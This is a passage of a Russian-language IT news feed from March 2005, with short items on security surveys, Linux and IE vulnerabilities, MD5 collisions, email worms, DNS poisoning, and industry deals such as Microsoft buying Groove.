Почти две трети корпоративных пользователей не имеют инструментов для определения внутренних сетевых атак и защиты от них. Таким образом, корпоративные сети остаются открытыми для «невидимых» взломов, приходят к выводу в своем исследовании сотрудники компании Websense, сообщает сайт vnunet.com. Из 500 опрошенных Websense IT-менеджеров европейских компаний 60 процентов признались, что не имеют систем для защиты от атак изнутри. «Проблема в том, что это случается незаметно для IT-менеджеров. Они полагают, что держат в руках зонтик, который поможет всегда остаться сухими, а в реальности он оказывается полным дыр», — прокомментировал результаты исследования технический директор Websense Марк Муртаф (Mark Murtagh). По мнению эксперта аналитической компании Gartner Джея Хейзера (Jay Heiser), надежным средством защиты от внутренних угроз может стать ограничение доступа сотрудников к сетевым ресурсам. Работники компаний должны получать доступ только к тем ресурсам, которые необходимы им для выполнения должностных обязанностей. Впрочем, взломы изнутри — не единственная угроза, которую игнорируют большинство компаний. Другими опасностями являются фишинг (с ним не могут справиться 62 процента компаний) и шпионские программы (свою слабость перед ними признают 35 процентов компаний). Около половины сотрудников компаний записывают свои пароли для доступа к ресурсам на бумаге. Около трети сотрудников сообщают свои пароли другим лицам.
Viruslist

16/03/2005 12:49 В Голландии за DoS-атаки приговорил пятерых хакеров
Гаагский суд приговорил пятерых молодых компьютерных хакеров к общественным работам, тюремному заключению или домашнему аресту - в зависимости от степени тяжести совершенного. В октябре прошлого года они совершили атаку на несколько правительственных вебсайтов, в результате чего информация на них стала недоступной в течение пяти дней. Главный подозреваемый, в возрасте 18 лет, был приговорен к 38 дням тюремного заключения и 240 часам общественных работ. Остальные были приговорены к общественным работам и домашнему аресту. Это - первый судебный процесс над хакерами со времен громкого скандала в Нидерландах по поводу т.н. DDoS-атак /DDoS = Distributed Denial of Service/, суть которых в огромном количестве запросов к серверу.
Crime-Research

16/03/2005 12:26 Cookies – это не опасно. В большинстве случаев...
Западные интернет-компании жалуются, что пользователи, стирающие подсаженные на их компьютеры файлы cookies, мешают нормальной работе их сайтов. Опросив 4600 покупателей американских интернет-шопов, исследовательская компания Jupiter Research подсчитала, что не менее 58 процентов пользователей Сети хоть раз в жизни вычищали своих компьютеры от тысяч cookies – безвредных, по большому счету, файлов, отслеживающих перемещения пользователей по сайту и выявляющих их потребительские предпочтения. Более того, почти сорок процентов пользователей удаляют "шпионов" регулярно: не реже раза в месяц. Главной причиной столь трепетного отношения обитателей интернета к тайне своей личной жизни аналитики Jupiter Research называют страх пользователей перед коварными хакерами, похищающих чужие кредитные записи и вытворяющих прочие непотребства. Зная, что важная информация похищается с компьютеров с помощью невидимых глазу шпионских программ, пользователи наивно отождествляют cookies со spyware, сообщает TechWeb.
Источник

16/03/2005 11:52 Уязвимость в ядрах Linux
Georgi Guninski cообщил о существовании уязвимости в ядрах Linux 2.6.x к переполнению буфера. Функция "sys_epoll_wait()" допускает целочисленное переполнение буфера, что может привести к выполнению произвольного кода и, как следствие - повышению локальных привилегий. Об эксплоите пока не обьявлено, уязвимость устранена в ядрах версии 2.6.11.2 и более поздних.
Подробности

16/03/2005 11:29 Что IE грядущий нам готовит
Начали просачиваться сведения о новых возможностях IE7, бета-версия которого предположительно выйдет этим летом, сообщает bugtraq.ru. Появится tabbed-browsing (вполне предсказуемо), встроенный агрегатор RSS и, возможно, интеграция с AntiSpyware. Плюс некоторое количество усовершенствований в области безопасности и всякие рюшки типа поддержки международных доменных имен, упрощенной печати и т.п.
Подробности

16/03/2005 11:17 Программисты критикуют план Microsoft в отношении Visual Basic
Свыше ста влиятельных разработчиков, использующих продукты Microsoft, подписали петицию к софтверному гиганту с требованием пересмотреть планы о прекращении поддержки Visual Basic в его «классической» форме. Разработчики, члены программы Microsoft Most Valuable Professional, утверждают, что этот шаг вызовет прекращение разработки миллионов приложений Visual Basic 6 (VB6) и оставит не у дел программистов, не освоивших новые языки. Microsoft объявила о прекращении в конце этого месяца стандартной поддержки Visual Basic 6 в форме бесплатных эпизодических звонков в сервисную службу и выпуска критических обновлений. Обе службы сохранятся еще на три года как платные. Но MVP надеются, что Microsoft не только пересмотрит варианты поддержки VB6, но и продолжит развитие этой версии языка наряду с новой Visual Basic.Net. «Предложив новую версию Visual Basic на базе СОМ в составе Visual Studio IDE, Microsoft поможет своим заказчикам защитить инвестиции в существующий код и продемонстрирует приверженность к основному языку Visual Basic, существенно упростив при этом освоение VB.NET для всех желающих, — говорится в обращении. — Решения о том, как и когда переводить код на .Net, должны приниматься самими пользователями». Разработчики видят проблему в том, что когда Microsoft выпустила Visual Basic.Net (или Visual Basic 7), она, по существу, отказалась от предыдущего языка и заменила его совершенно новым. Приложения VB6 практически невозможно перенести на VB.Net, и для программистов на VB6 освоение VB.Net дается с таким же трудом, что и обучение новому языку программирования.
Подробности

16/03/2005 10:16 Подозрительная фраза в соглашении сервиса AIM была обнаружена через год после появления
Компания America Online (AOL) оказалась в центре публичного разбирательства, касающегося условий использования ее интернет-пейджингового сервиса AOL Instant Messenger (AIM), который позволяет общаться в реальном времени через Интернет. Пользователи обнаружили в пользовательском соглашении, с которым необходимо согласиться перед началом пользования сервисом, фразу "Вы отказываетесь от всех прав на конфиденциальность" ("You waive any right to privacy"). Как сообщает издание CNet News, фраза находится в большом тексте соглашения, и отыскать ее, не изучая документ, трудно. Текст вступил в силу в феврале 2004 года, однако вызвавшая резонанс формулировка была обнаружена только сейчас. Комментаторы во всем мире, главным образом блоггеры, немедленно начали публиковать свои соображения о причинах появления подобной сентенции - главной версией стало соображение о том, что AOL производит мониторинг пользовательских разговоров с неизвестной корыстной целью. Представители AOL быстро отреагировали на эту информацию и заявили, что формулировка просто является неудачной. Она была введена в текст соглашения для того, чтобы юридически обеспечить нормальную работу функции AIM "Rate-a-Buddy", в рамках которой пользователи размещают свои фотографии, которые другие пользователи оценивают на предмет привлекательности. Подобные интернет-сервисы весьма популярны среди пользующейся Интернетом молодежи со времени появления первого из них - AmIHotOrNot.com. America Online намеревается в кратчайшие сроки изменить текст пользовательского соглашения и представить новую версию уже во вторник. Представители компании подчеркивают, что AOL не заинтересована в мониторинге переговоров своих клиентов, подобные действия возможны только при особых обстоятельствах, например, с санкции суда.
Lenta.Ru

13/03/2005 12:43 AOL нацелилась на VoIP
Компания America Online намерена в ближайший месяц выпустить в свет сервис интернет-телефонии. Об этом в минувший вторник заявил CEO компании Джонатан Миллер (Jonathan Miller), передает News.Com. Как сообщается, в рамках сервиса будет предоставляться особый адаптер, при помощи которого к широкополосному интернет-соединению можно будет подключать обычные телефонные трубки. Сервис будет также доступен с персонального компьютера, будет интегрирован в интернет-пейджер и почтовик от AOL. Господин Миллер отметил, что в планах стоит в том числе и беспроводная IP-телефония, однако воздержался назвать точную дату реализации этого проекта.
Вебпланета

13/03/2005 11:55 Новый антивирус Panda Platinum Internet Security 2005
Компания Panda Software начала поставки на российский рынок нового антивируса Panda Platinum Internet Security 2005 для продвинутых пользователей и малого бизнеса. Новый Panda Platinum Internet Security 2005 имеет русский интерфейс и включает в себя защиту от известных и неизвестных вирусов, хакеров, спама, программ-шпионов и прочих интернет-угроз, а также технологию веб-фильтрации контента. Platinum Internet Security 2005 автоматически обнаруживает и устраняет все типы вирусов, червей и троянцев, в то время как пользователь посылает или получает электронную почту, скачивает файлы или работает в интернете. При этом механизм сканирования UltraFast проверяет всю информацию, практически не используя системных ресурсов. Дополнительную защиту от вирусов и вторжений обеспечивают усовершенстованный межсетевой экран и технология ТruPrevent - поведенческий анализатор действий программ на компьютере, выявляющий вредоносный код не по его признакам, а по тому, какие действия он совершает в системе. Функция анти-спама позволяет автоматически блокировать нежелательную почту. Анти-шпионская технология блокирует программы, которые следят за активностью пользователя в интернете для того, чтобы посылать спам или похищать конфиденциальную информацию. Защита также блокирует программы, которые незаметно соединяют модем с удаленными платными номерами. Технология фильтрации веб-контента ограничивает доступ к личным почтовым учетным записям, интернет-магазинам, порно-ресурсам. Обновление Platinum Internet Security 2005 происходит один раз в день в автоматическом режиме.
Panda Software

13/03/2005 11:40 Выход MySQL 4.1.10a и 4.0.24
Выпущены релизы MySQL 4.1.10a и MySQL 4.0.24 - новых версий популярной открытой СУБД. В обоих релизах MySQL устранены потенциальные уязвимости в безопасности при создании временных табличных файловых имен и в обработке определенных пользователем функций (User Defined Functions, UDF). Разработчики в анонсе поблагодарили Стефано Ди Паола (Stefano Di Paola), который им сообщил о найденных ошибках. Исходники и бинарные сборки MySQL 4.1.10a и MySQL 4.0.24 для различных платформ уже доступны для свободного скачивания на dev.mysql.com.
Nixp.Ru

13/03/2005 11:19 Самоуничтожающаяся память USB-флэшки для «двойной бухгалтерии» и против шпионов
Калифорнийская фирма RedCannon представила подключаемый к USB-порту flash-накопитель, который, как считает компания, представляет собой самый безопасный способ хранения данных среди всех устройств данного типа. KeyPoint Crypto Mobile Storage использует 256-битное шифрование данных и имеет несколько уровней защиты от несанкционированного доступа. Подобные USB-устройства для хранения закодированных файлов известны на рынке, однако KeyPoint KMS отличается от них рядом нововведений. Это первое криптографическое USB-устройство, которым можно управлять через локальную сеть. Достаточно присоединить несколько таких "флэшек" к ряду компьютеров, чтобы создать разветвлённое хранилище, управляемое системным администратором предприятия или компании. Кроме того, в устройстве применено сжатие данных (до 8 раз), оно не требует установки специального программного обеспечения на компьютере, к которому присоединяется, так как само занимается криптографическим кодированием из декодированием данных, которые и хранит. Системный администратор может определить для конкретного KeyPoint KMS режим доступа - одного пользователя или группы, удалённо контролировать все случаи записи и считывания, также удалённо стирать данные. Главное же отличие этой "флэшки" от похожей продукции конкурентов - это функция самоуничтожения всей информации после нескольких неудачных попыток доступа (с неправильным паролем или ключом).
Источник

13/03/2005 10:10 В войне DVD-форматов Apple встала на сторону Blu-ray
Представители Apple на выставке CeBIT объявили о вхождении компании в партнерство Blu-ray, которое выступает за массовое внедрение одноименного стандарта оптических носителей следующего поколения. Как ранее сообщалось, в настоящее время мировые производители цифровой техники и медиапродукции выбирают, какой из двух разработанных стандартов станет следующим общепринятым форматом, который призван прийти на смену DVD. Борьба ведется между сторонниками форматов Blu-ray, предложенного Sony и Dell, и HD-DVD, который создали Toshiba, NEC и Sanyo. Диски Blu-ray более сложны в изготовлении, более дорогие и способны вмещать до 50 гигабайт данных (против 4 гигабайт в современном DVD). Диски HD-DVD в изготовлении более просты и более дешевы, но их емкость не превышает 30 гигабайт. Сторонники Blu-ray объединились в альянс, в который уже входят Dell, Sony, Hewlett-Packard, Hitachi, Mitsubishi, Panasonic, Philips, Samsung и LG. Стандарт поддерживают также кинокомпании Walt Disney, 20 Century Fox и Sony Pictures. HD-DVD поддерживают NEC, Toshiba, Sanyo и видеодистрибьюторская компания Warner Home Video.
Подробнее

12/03/2005 15:24 Безопасность "Транснефти" обеспечит InfoWatch
Компании InfoWatch и КРОК подписали соглашение о совместном внедрении комплекса защиты от утечки информации в ОАО "АК "Транснефть". Для обеспечения непрерывности производственного процесса на предприятии внедрена распределенная компьютерная инфраструктура, с целью дальнейшего развития которой принято решение о модернизации узла доступа в Internet. В рамках этого проекта, проводимого компанией КРОК, предполагается внедрение и решений InfoWatch. В сети компании обрабатываются сведения конфиденциального характера, поэтому система защиты конфиденциальной информации имеет для нас первостепенное значение", - заявили вице-президент "Транснефти" Сергей Григорьев. По словам представителей InfoWatch, ее решения позволяют контролировать обращение конфиденциальной информации в корпоративной сети и предотвращать утечку данных наиболее опасными путями через электронную почту, Web-трафик, печатающие устройства и мобильные накопители.
"Открытые системы"

12/03/2005 14:22 Хакер несколько месяцев шпионил за Ericsson
26-летнего венгра Ксабу Рихтера (Csaba Richter) обвинили во взломе корпоративных сетей Sony Ericsson и Ericsson в целях промышленного шпионажа. Рихтер имел доступ ко внутренней коммерческой информации Ericsson в течении нескольких месяцев. Его обвинили в том, что он намеревался продать собранные данные. Однако хакер утверждает, что он хотел просто проверить сети на уязвимость, тем самым доказав свой профессионализм, а затем устроится на работу в телекоммуникационную компанию. По некоторым источникам, утечка части собранных данных представляла бы угрозу национальной безопасности Швеции, сообщил Silicon и cnews.
SecurityLab

12/03/2005 14:18 MSN Messenger превратился в площадку для червивых войн
Через несколько недель после выпуска залатанной версии MSN Messenger, на сцену вышли два новых червя - Kelvir.B и Fatso.A, cообщает bugtraq.ru. Любопытно, что Fatso.A содержит пламенное послание некой Larissa (Ларисе?), предположительно ответственной за написание распространявшегося ранее "хорошего" червя Assiral.A, занимающегося очисткой системы от червя Bropia.
Подробности

12/03/2005 13:46 170 Mbps из розетки
Японские гиганты Sony, Mitsubishi и Matsushita создали новую технологию для организации домашних локальных сетей. Передача данных осуществляется по электропроводке со скоростью 170 Mbps. О своей разработке представители трех японских компаний объявили во время проходящей в Ганновере выставки CeBIT. Перед журналистами выступил д-р Инго Хмелевски (Ingo Chmielewski), директор Европейского научно-исследовательского центра Matsushita. Он раскрыл некоторые технические детали проекта. По его словам, новая технология дает возможность передавать по домашней электропроводке информацию на скоростях до 170 Мбит/с, что в три раза превосходит возможности беспроводного стандарта Wi-Fi и вполне достаточно для трансляции качественного телевизионного сигнала в цифровом стандарте HDTV. В отличие от беспроводной связи, здесь поддерживается стабильная скорость передачи данных по всей квартире. Технология уже полностью готова, и устройства на ее основе появятся на рынке сразу после того как пройдут государственную авторизацию. Для продвижения нового стандарта компании Sony, Mitsubishi и Matsushita организовали альянс SECA, который будет конкурировать с HomePlug — известной группой, куда входит 50 компаний, в том числе Sharp и та же Sony. Члены группы HomePlug уже представили технологию для передачи данных по электропроводке, но спецификации HomePlug 1.0 предусматривают гораздо меньшую пропускную способность: всего 14 Мбит/с. Сейчас члены альянса работают над более быстрой версией HomePlug 2.0. Однако их, судя по всему, опередили.
Подробности

12/03/2005 13:14 StarOffice заговорит на русском языке
Компания Sun Microsystems обещает, что офисный пакет StarOffice 8 выйдет уже в августе. В течение последующего года, к нему будут выпущены русская, польская и голландская локализации. Сейчас, как пишет InfoWorld, конкурирующий с аналогичным продуктом Microsoft пакет StarOffice поддерживает лишь 11 языков, что, без сомнения, не самым лучшим образом сказывается на показателях продаж офисного комплекта. Чтобы решить проблему, Sun намеревается в течение ближайших полутора лет подготовить еще пять новых иноязычных интерфейсов. Но если с русскими, поляками и голландцами уже все более-менее понятно, то еще два счастливых народа, языки которых окажутся в списке поддерживаемых, пока не определены.
Internet.Ru

12/03/2005 13:09 Билл Гейтс остается богатейшим человеком планеты
Журнал Forbes опубликовал ежегодно составляемый список самых богатых людей планеты. В 2004 году миллиардеров стало больше - их число выросло с 587 человек в 2003 году до 691 в 2004 году. Эксперты считают, что увеличить доходы и попасть в список миллиардеров многим помогло падение курса доллара. Совокупное состояние богачей достигло 2,2 трлн. долларов США, год назад этот показатель составлял 1,4 трлн. долларов США. Богатейшим человеком в мире назван Билл Гейтс, что, впрочем, совсем не стало неожиданностью, так как пальма первенства принадлежит основателю компании Microsoft уже одиннадцатый год подряд. Состояние Гейтса оценивается в 46,5 млрд. долларов США. На 2,5 млрд. долларов США отстает от него глава инвестиционного фонда Berkshire Hathaway Уоррен Баффет, которому досталось второе, не менее почетное, место. На третьей позиции находится индийский сталелитейный магнат Лакшми Миттал, накопивший 25 млрд. долларов США. Мексиканский предприниматель Карлос Слим Элу, увеличивший свое состояние на 10 млрд. долларов США, переместился на четвертое место. В число миллиардеров попали основатели Google Сергей Брин и Ларри Пейдж, каждый из которых владеет 7,2 млрд. долларов США. Далеко позади них остались основатели успешной интернет-компании Yahoo Дэвид Файло (3,1 млрд. долларов США) и Джерри Янг (2,6 млрд. долларов США), сколотившие свои состояния упорным трудом за десять лет.
Список

12/03/2005 12:36 История BeOS продолжается.
На выставке Cebit в Ганновере немецкая компания YellowTab продемонстрирует альтернативную операционную систему Zeta 1.0, построенную на базе кода BeOS 5.1, сообщает linux.org.ru. Основные компоненты системы: доработанное ядро с новой VM, файловая система BFS; поддержка Centrino WiFi; система печати CUPS, порт SANE; драйверы nVidia с поддержкой PCI-Express; новый стек USB2; более полная локализация приложений; также в дистрибутив включены python 2.4, bash 3.0, openssh 3.9p1.
Подробности

12/03/2005 12:14 Microsoft покупает Groove
Софтверный гигант решил приобрести компанию Groove Networks и введет в Microsoft Office ее «виртуальный офис». Автор Lotus Notes Рэй Оззи займет пост главного технолога Microsoft. В четверг Microsoft объявила о своем намерении приобрести компанию Groove Networks и сделать ее основателя Рэя Оззи своим главным технологом. Microsoft введет ПО коллективной работы Groove «виртуальный офис» в собственное семейство офисных приложений Office. Оззи, изобретатель Lotus Notes и гуру ПО коллективной работы, будет подчиняться непосредственно председателю правления и главному архитектору ПО Microsoft Биллу Гейтсу. Оззи станет одним из трех главных технологов Microsoft. Он будет отвечать за ПО для работы с информацией и инструменты коллективной работы. Два других главных технолога — это Дэвид Васкевич, который занимается бизнес-приложениями, и Крейг Манди, отвечающий за новые технологии, такие как встроенные вычисления, и за общие технические стратегии. Гейтс похвалил успехи Groove в сфере ПО коллективной работы для Microsoft Office и сказал, что опыт Оззи в других областях, особенно в области безопасности, аутентификации и peer-to-peer вычислений, будет полезен и для других продуктов Microsoft, включая будущую версию Windows Longhorn. «Я давно мечтал заполучить Рэя и его команду, поэтому сегодня для меня очень счастливый день, — сказал Гейтс в четверг на пресс-конференции. — Продукты Groove в самом деле обладают некоторыми фантастическими и уникальными возможностями». Microsoft была инвестором Groove, разработки которой в области ПО коллективной работы тесно связаны с Windows и другими продуктами этой компании. Теперь группа Groove станет частью отделения Information Worker. Ожидается, что операция по приобретению Groove завершится во втором квартале. Условия сделки не разглашаются. Groove основана в 1997 году с целью создания программ для коллективной работы с информацией. Сейчас в компании 200 сотрудников, и она сохранит свое местоположение в штате Массачусетс. Никаких сокращений в Groove не планируется. Программное обеспечение Groove Virtual Office позволяет людям из разных компаний работать по защищенным интернет-каналам. Продукт использует структуру peer-to-peer, в которой отдельные ПК могут связываться непосредственно друг с другом для обмена документами или сообщениями. Он продается как дополнение к ПО веб-портала Microsoft SharePoint, так как позволяет мобильным работникам получать обновления по текущим проектам без необходимости прибегать к виртуальной частной сети.
Подробности

12/03/2005 11:58 Британский суд обязал провайдеров "сдавать" уличенных в пиратстве клиентов
Высокий суд Великобритании удовлетворил просьбу Британской ассоциации производителей фонограмм (BPI), которая требовала от ряда интернет-провайдеров страны раскрыть имена и адреса своих клиентов, уличенных в размещении конрафактных копий музыкальной продукции в файлообменных сетях. BPI подала ходатайство в рамках расследования дел о нелегальном распространении через Интернет музыки, защищенной авторским правом. Ее сотрудники отследили 31 клиента шестерых провайдеров, занимавшихся подобной деятельностью. Суд постановил, что данные о личностях клиентов должны быть предоставлены провайдерами истцу в течение 14-дневного срока, сообщает агентство Reuters. Как предполагается, после установления личностей нарушителей им будут предъявлены обвинения в пиратстве. "Это удар по нелегальным распространителям музыки, которые думают, что закон их не касается", - заявил представитель BPI. Накануне BPI достигла внесудебного соглашения с 23 британскими гражданами, которые согласились выплатить ассоциации в среднем по 2200 фунтов в обмен на отзыв исков. Как ранее сообщалось, в начале января аналогичный процесс проходил в одном из судов США - ассоциация американских рекорд-лейблов RIAA добивалась от провайдера Charter Communications выдачи личных данных о клиентах, однако ее иск не был удовлетворен.
Lenta.Ru

11/03/2005 10:47 Mozilla 1.8 final не будет
В официальном документе от Mozilla Foundation объясняются причины выхода альфа и бета версий Mozilla SeaMonkey 1.8, а также причины по которым финальный релиз этого набора приложений никогда не выйдет, сообщает linux.org.ru. Также организация просит у всех прощения за недосказанность по отношению к этому продукту: "In addition, a set of people have done a non-trivial amount of work on 1.8 features, thinking this would be part of an official Mozilla Foundation release. This has been a error on our part. These contributors have reason to be unhappy with us. We can only apologize, at the same time recognizing that apologies only go so far and can't fix the error." Организация будет развивать только Mozilla Firefox/Thunderbird/Sunbird. Последним поддерживаемым релизом SeaMonkey будет версия 1.7.6, которая скоро выйдет.
Подробности

11/03/2005 10:26 Конец алгоритма MD5?
Ранее мы сообщали о том, что группой китайских криптографов был определён алгоритм потенциального взлома алгоритма хэширования MD5 (август 2004 г.). Сам метод, тем не менее, держался в секрете. Их исследования были продолжены австралийскими коллегами. Однако, реализация подобных методов взлома хэщей была ограничена вычислительными мощностями, необходимыми для получения приемлемых результатов. И вот, в вэб-логе известного исследователя компьютерной безопасности Брюса Шнайера появилось сообщение, что чешским криптографам удалось взломать MD5 за 8 часов с использованием обычного ноутбука с процессором частотой 1.6 ГГц! Это было достуигнуто благодаря 2.5-месячной работе, в результате чего суммарная скорость подбора коллизий хэшей MD5 в 6-8 раз быстрее китайских методов. Приводится вариант сертификатов X.509, которые имеют одинаковый хэш MD5. Результаты подобных исследований очевидны и не могут не настораживать. Приведм вариант атаки. Вполне легитимный сайт получает сертификат X.509 от одного из центров авторизации (CA). Затем создаётся поддельный сайт (Victim.com), На котором формируется поддельный люч с идентичным хэшем MD5. Затем проводится атака на один из DNS-серверов (либо клиента, либо сервера) и формируется NS-запись, ведущая на фэйк-сервер. При обращению к поддельному сайту CA подтверждает поддельный сертификат. Господа, создавшие поддельный сайт, получают доступ ко всей конфиденциальной информации истинного сервера (номера кредитных карточек, пин-коды и т.д.).
Более подробно

11/03/2005 10:03 Авторы Bagle, Zafi и Netsky сотрудничают друг с другом
"Лаборатория Касперского" сообщает о том, что ее вирусные аналитики пришли к выводу о существовании тесного взаимодействия между авторами червей Bagle, Zafi и Netsky. Вредоносная программа SpamTool.Win32.Small.b, обнаруженная компанией 15 февраля и выполнявшая скрытый сбор адресов электронной почты на персональных компьютерах, попутно исключая из найденных адреса антивирусных компаний, оказалась частью организованной 1 марта атаки червя Bagle. Дальнейший анализ ситуации позволяет сделать вывод о том, что авторы червей Bagle, Zafi, Netsky и ряда других осуществляют тесное взаимодействие между собой. Возможно, они не знакомы между собой лично, но то, что они используют для рассылок червей информацию, полученную автором Bagle, не вызывает сомнений. Стоит отметить и тот факт, что в течение только двух дней было разослано порядка 50 различных модификаций вредоносных программ. Все рассылки производятся распределенными по времени, что говорит о том, что они происходят в автоматическом или полуавтоматическом режиме.

11/03/2005 09:47 Сайты станут главным источником вирусов
Для распространения вредоносных программ хакеры и вирусописатели все чаще прибегают к веб-сайтам, а не к электронной почте. К такому выводу пришли сотрудники разрабатывающей веб-фильтры компании Websense, сообщает сайт vnunet.com. В отчете Web Security Trends Report сотрудники Websense отмечают, что онлайн-преступники нарушают работу поисковых машин и в конечном результате приводят интернет-пользователей на зараженные сайты. По сведениям докладчиков, все большее число компаний блокируют зараженные электронные письма с помощью защитных программ, в связи с чем вирусописатели заражают коды веб-страниц. Чтобы привлечь пользователей на такие сайты, вирусописатели выводят их в первые строки поисковых результатов. «Мы полагаем, что рост числа «отравленных» поисковых результатов будет продолжаться. Согласно такому сценарию, преступники будут прилагать усилия к тому, чтобы их сайты появлялись на высоких позициях в поисковых запросах. Например, при поиске антишпионского программного обеспечения на первых позициях могут оказаться сайты со шпионскими программами», — говорится в отчете. Две трети атак с сайтов сводятся к установке на компьютер пользователя троянской или другой вредоносной программы. Около четверти инцидентов связано с принудительной установкой домашней страницы и добавления вредоносного сайта в избранное.
Viruslist

11/03/2005 09:35 Novell добавит Xen в следующую версию Linux
Очередная версия продукта Novell SuSE Linux, которая выйдет в середине апреля, позволит исполнять несколько копий операционной системы одновременно. Поддержка нескольких копий ОС в SuSE Linux Professional 9.3 осуществляется посредством ПО Xen, пакета open source, конкурирующего с продуктами Microsoft и EMC VMware, который уже завоевал признание некоторых крупных заказчиков. Эта технология создает новые возможности для программистов и полезна для решения многих задач, подчеркнул директор по маркетингу SuSE Linux Грег Манкузи-Унгаро. Xen создает виртуальную машину, которую операционная система считает реальным компьютером. Исполняя операционную систему на такой платформе, разработчики могут безболезненно тестировать новое ПО, не рискуя вывести из строя основной компьютер. Например, им не нужно беспокоиться о том, что в результате сбоя могут пострадать важные системные файлы. Однако Xen пока еще находится в достаточно сыром виде. По словам Манкузи-Унгаро, это ПО войдет в версию Linux, но не будет устанавливаться по умолчанию. Novell анонсировала новую версию Linux в четверг на выставке CeBit в Германии. В Европе, где SuSE Linux продается лучше всего, она будет стоить 74 евро ($99), однако цены для США пока не определены. Xen представляет собой ПО типа hypervisor, которое работает непосредственно на аппаратуре компьютера, управляя доступом операционной системы к памяти, подсистеме ввода-вывода и другим ресурсам. Пока Xen может исполнять лишь модифицированные версии Linux на системах х86, но идет работа над распространением этого ПО на другие операционные системы и процессорные платформы.
Подробности

11/03/2005 09:11 Правительство США разрешило китайскому концерну купить компьютерное подразделение IBM
Комитет по иностранным инвестициям правительства США одобрил сделку американской корпорации IBM и китайского концерна Lenovo. Как ранее сообщалось, две компании в минувшем декабре заключили договор о продаже китайской стороне подразделения IBM по производству персональных компьютеров, сообщает издание CNET News.com. Предполагается, что сумма сделки составит 1,25 миллиарда долларов, и после ее завершения Lenovo должна стать третьим по величине в мире производителем ПК. Сделка вызвала опасения у членов Конгресса США, которые посчитали приход крупной компании на американский рынок угрозой государственной безопасности - Lenovo намеревается намеревается развернуть крупное административное подразделение в городе Роли (Raleigh), штат Северная Каролина, где находятся заводы IBM. По мнению конгрессменов, крупный офис китайской компании в американском промышленном центре может стать базой для китайских государственных агентов, проводящих промышленный шпионаж, так как в Китае бизнес связан с государством. Конгрессмены выразили свои опасения правительству, которое должно было принять окончательное решение. В итоге сделка была одобрена - многие эксперты-экономисты считают, что опасения парламентариев безосновательны. Китай и без того обладает всеми современными компьютерными технологиями, и китайским компьютерщикам нет смысла охотиться за технологиями, которые применяются на заводах IBM.
Lenta.Ru

10/03/2005 17:59 Эксплоит уязвимости в Internet Explorer
Опубликован эксплоит уязвимости в Internet Explorer, связанной с некорректной обработкой CSS (Cascading Style Sheets) в библиотеке mshtml.dll. Позволяет создать css-файл, который, будучи выполнен в Internet Explorer позволяет выполнить произвольный код на машине жертвы.
Эксплоит

10/03/2005 17:30 eEye дополняет список операционных систем, обладающих уязвимостью MS05-011
Как сообщают специалисты компании eEye, занимающейся компьютерной безопасностью, ими обнаружена уязвимость в ОС, которая не включена в отчёт уязвимых ОС, описанных в MS05-011. В качестве такой ОС значится Windows NT 4.0. MS05-11 описывает уязвимость в семействе Windows при обработке сетевого протокола SMB (драйвер MRXSMB.SYS). Патч к этой довольно неплохо зарекомендовавшей себя ОС также не был выпущен, что, впрочем, вызвано также тем, что официально M$ прекратила поддержку этой ОС. Однако, как стало известно eEye, M$ был выпущен частный закрытый патч для тех пользователей, которые заплатили за расширенную поддержку этой ОС. Для защиты этой ОС специалисты eEye предлагают использовать систему подписи SMB (SMB signing). Как это сделать, написано на сайте Microsoft.
Подробности

10/03/2005 13:47 Symantec защитила решения от DNS-атак
Корпорация Symantec выпустила обновление программного кода для старых версий корпортативных брандмауэров и устройств защиты шлюзов, позволяющее предотвращать DNS-атаки. Пользователям Gateway Security Appliance и Enterprise Firewall предлагается загрузить с сайта Symantec соответствующие пакеты. Атаки на систему доменных имен DNS позволяют хакерам переписывать соответствие имен сайтов с их IP-адресами, и перенаправлять пользователей на фальшивые веб-сайты. Это могут быть либо подставные сайты банков и других платежных систем, либо страницы известных сайтов, содержащие вредоносный код.
CNews

10/03/2005 13:28 Поисковики ведут в троянскую конюшню
По мере того, как простые пользователи и непростые системные администраторы все подозрительнее и подозрительнее относятся к зипованным дарам, приходящим по электронной почте от неизвестных данайцев, нехорошие люди все интенсивнее используют поисковые сервисы для заманивания жертв на сайты-ловушки. Эти выводы были сделаны экспертами компании Websense, в течение шести месяцев собиравшими данные для отчета Web Security Trends Report. По мнению экспертов, улучшение средств пассивной защиты компьютера от проникновения вредоносного кода, заставило злоумышленников использовать в качестве рассадника "жучков" специальным образом подготовленные веб-страницы. Чтобы сделать их максимально посещаемыми, хакеры переквалифицируются в поисковых спаммеров, накачивающих рейтинг страниц-ловушек. То есть, если сейчас, забредя на какой-нибудь "дорвей", потенциальный клиент не потеряет ничего, кроме нескольких секунд личного времени и десятка-другого килобайт трафика, то уже в самом ближайшем будущем страница, признанная Google или MSN Search наиболее релевантной запросу "антивирус", может оказаться ловушкой, на которой доверчивому посетителю и подсадят самую свежую версию какого-нибудь трояна, пишет Vnunet.com.
Internet.Ru

10/03/2005 12:36 Фишеры проталкивают шпионское ПО через дыры в защите DNS
Internet Storm Center обеспокоен тем, что онлайновые преступники «отравляют» систему доменных имен и переадресуют пользователей на веб-сайты злоумышленников. Онлайновые воры, охотящиеся за персональными данными, могут прибегать к более активным мерам по переадресации пользователей с легитимных сайтов на сайты злоумышленников, предупреждают эксперты по безопасности. Это предупреждение стало реакцией на появившиеся в пятницу сообщения о том, что компьютеры некоторых пользователей с таких сайтов, как eBay и Google, переадресуются на веб-серверы злоумышленников, пытающиеся установить на эти компьютеры шпионское ПО. По словам специалиста Internet Storm Centre Джейсона Лэма, подобные инциденты замечены в 30-40 сетях. «Трудно сказать, сколько людей от этого пострадали, но широкого распространения такая практика пока не получила», — сказал Лэм во вторник. Злоумышленники заменяют цифровые адреса популярных веб-сайтов в серверах DNS фальшивыми адресами. Такая схема, называемая «порчей DNS» (DNS poisoning), применяется для выуживания у пользователей ценной информации или для установки spyware на их ПК. Internet Storm Centre, объединяющий группу специалистов по реагированию на инциденты, организованную учебной организацией SANS Institute, подозревает, что для порчи DNS применяется обнаруженная недавно дыра в брандмауэрах и шлюзах Symantec. Однако жертвами стали и другие сайты, которые не применяют продукты Symantec, отметил Лэм. «Мы еще не установили причину этого явления, — сказал он. — У нас нет достаточной статистики, поэтому выводы делать трудно». Использование порчи DNS для переадресации пользователей на сайты, которые выглядят натурально, но на самом деле крадут ценную информацию, — относительно новый тип угрозы. Некоторые секьюрити-фирмы называют этот метод фармингом (pharming). Лэм предупредил, что если подобные атаки станут более изощренными, то их будет почти невозможно обнаружить.
ZDNet

10/03/2005 11:54 Франция наложила запрет на поиск уязвимостей
